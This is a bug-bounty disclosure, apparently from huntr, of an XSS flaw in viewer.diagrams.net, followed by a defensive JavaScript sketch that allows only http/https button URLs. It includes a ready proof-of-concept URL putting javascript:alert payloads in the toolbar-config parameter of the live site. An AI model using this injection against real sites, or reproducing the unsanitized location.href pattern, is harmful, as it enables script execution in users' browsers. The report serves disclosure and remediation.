huntr: joaovitormaia, 1816A207-6ABF-408C-B19A-E497E24172B3
History: Sep 05, 2022 - 10:11 p.m.

XSS at https://viewer.diagrams.net/

2022-09-05 22:11:53
joaovitormaia
www.huntr.dev
19
xss
vulnerability
diagrams.net

EPSS: 0.001

Percentile: 30.0%

Description

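The application reads the URLs for the toolbar's refresh and back buttons from a request parameter (`toolbar-config`) and assigns them to `location.href` without sanitizing them. A `javascript:` URL supplied in that parameter therefore executes in the page's origin when the button is clicked.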

Proof of Concept

Go to:

https://viewer.diagrams.net/index.html?tags=%7B%7D&highlight=0000ff&&layers=1&nav=1&toolbar=1&toolbar-config=%7B%22backBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D,%22refreshBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D%7D&title=xss.drawio#RdZNdb9sgFIZ%2FjaXtopUDTdZdxkmbatI2TVnVa2qoTQscD%2BPa6a%2FfIYA%2F1lWyZHjOy%2FnikNGdHg6WNfV34EJlJOdDRvcZIasrQjL%2F5fwUCF1HUFnJo2gCR%2FkmIswj7SQX7ULoAJSTzRKWYIwo3YIxa6Ffyp5ALaM2rBLvwLFk6j19kNzVgV6TLxO%2FE7KqU%2BTV5muwaJbEsZK2Zhz6GaI3Gd1ZABdWetgJ5ZuX%2BhLO3X5gHROzwrj%2FHLhvhf35%2BOx7QnLFHvFezqKMbBTqiycw3tK6Uyx186eDZLhozxexRcE6b%2FAyi8mOq8r%2Ff4vBJWcYNfgLppCakuYlxHxmr6wtrWzQuF1sfLr%2BW%2BcMW27dJw5lp7GiSw6aSfM5uEpFr39ct923fP9r%2F3ab3w2H432nL1ZjM8cmTVUR59OkRe20b8AKl62z8CJ2oMAiMWCEr1oq9Q9iSlYGtyWmI5AXr5igxNHYRoOWnPswRV9LJ44NK33MHh8CMgud4cLnnY8d8Q7E8OH9zQs5CNDC2RNK4gFK4yDFl0Q2cd9Pc5lQPRvJdIzFl1CNnqdhwUXsXdrOxiehaVTP8tmDpzd%2FAQ%3D%3D

Click the refresh or the back icon on the toolbar.
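One way to close this class of bug is to resolve the button URL and allow only `http:`/`https:` before it reaches `location.href`. The sketch below is an added example, not diagrams.net's code or its actual fix; the helper names, the `viewer.example` host and the sample URL are assumptions made for illustration.

```javascript
// Added example: hypothetical helpers, not taken from the diagrams.net source.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Resolve `raw` against `base` and return the normalized absolute URL only
// when its scheme is http(s); otherwise return null. Parsing with URL (rather
// than a regex on the string) means mixed case, leading whitespace and
// embedded tabs/newlines are normalized before the scheme is checked.
function safeNavigationUrl(raw, base) {
  if (typeof raw !== 'string') return null;
  let parsed;
  try {
    parsed = new URL(raw, base);
  } catch (e) {
    return null; // unparseable input is rejected, never passed through
  }
  return ALLOWED_PROTOCOLS.has(parsed.protocol) ? parsed.href : null;
}

// Read backBtn/refreshBtn URLs from the toolbar-config query parameter of
// `pageUrl` and return only the ones that are safe to navigate to.
function toolbarButtonUrls(pageUrl) {
  const page = new URL(pageUrl);
  let config;
  try {
    config = JSON.parse(page.searchParams.get('toolbar-config') || '{}');
  } catch (e) {
    config = {}; // malformed JSON: treat as no configuration
  }
  const result = {};
  for (const name of ['backBtn', 'refreshBtn']) {
    const btn = config !== null && typeof config === 'object' ? config[name] : undefined;
    result[name] = btn ? safeNavigationUrl(btn.url, page.origin) : null;
  }
  return result;
}

// Constructed sample input: one script-scheme URL, one same-site relative URL.
const SAMPLE_PAGE_URL = 'https://viewer.example/index.html?toolbar-config=' +
  encodeURIComponent(JSON.stringify({
    backBtn: { url: 'javascript:alert(document.domain)' },
    refreshBtn: { url: '/index.html?page=2' },
  }));

console.log(toolbarButtonUrls(SAMPLE_PAGE_URL));
```

The check restricts the scheme only; a caller that must also keep navigation on-site would additionally compare the resolved origin against its own.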
